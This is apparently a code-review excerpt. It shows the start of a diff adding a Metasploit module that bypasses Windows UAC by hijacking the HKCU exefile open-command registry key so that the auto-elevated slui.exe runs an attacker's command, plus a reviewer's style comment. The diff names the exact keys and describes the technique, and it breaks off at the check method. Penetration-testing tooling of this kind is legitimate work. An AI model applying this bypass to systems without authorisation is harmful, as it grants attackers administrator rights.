modules/exploits/windows/local/bypassuac_sluihijack.rb

```diff
@@ -0,0 +1,211 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Post::Windows::Registry
+  include Post::Windows::Runas
+
+  SLUI_DEL_KEY          = "HKCU\\Software\\Classes\\exefile".freeze
+  SLUI_WRITE_KEY        = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
+  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
+  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
+  SLUI_PATH             = "%WINDIR%\\System32\\slui.exe".freeze
+  CMD_MAX_LEN           = 16383
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
+        'Description'   => %q{
+          This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
+          the Current User hive, and inserting a custom command that will get invoked when any binary
+          (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
+          to file handler hijacking. When we run slui.exe with changed Registry key
+          (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
+          instead of slui.exe.
+
+          The module modifies the registry in order for this exploit to work. The modification is
+          reverted once the exploitation attempt has finished.
+
+          The module does not require the architecture of the payload to match the OS. If
+          specifying EXE::Custom your DLL should call ExitProcess() after starting the
+          payload in a different process.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'bytecode-77', # UAC bypass discovery and research
+          'gushmazuko', # MSF & PowerShell module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+        'DefaultTarget' => 0,
+        'References'    => [
+          [
+            'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation',
+            'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
+          ]
+        ],
+        'DisclosureDate' => 'Jan 15 2018'
+      )
+    )
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
```

Comment:
Not a big deal, but `Exploit` is redundant here in `Exploit` context.

`CheckCode::Appears` is sufficient.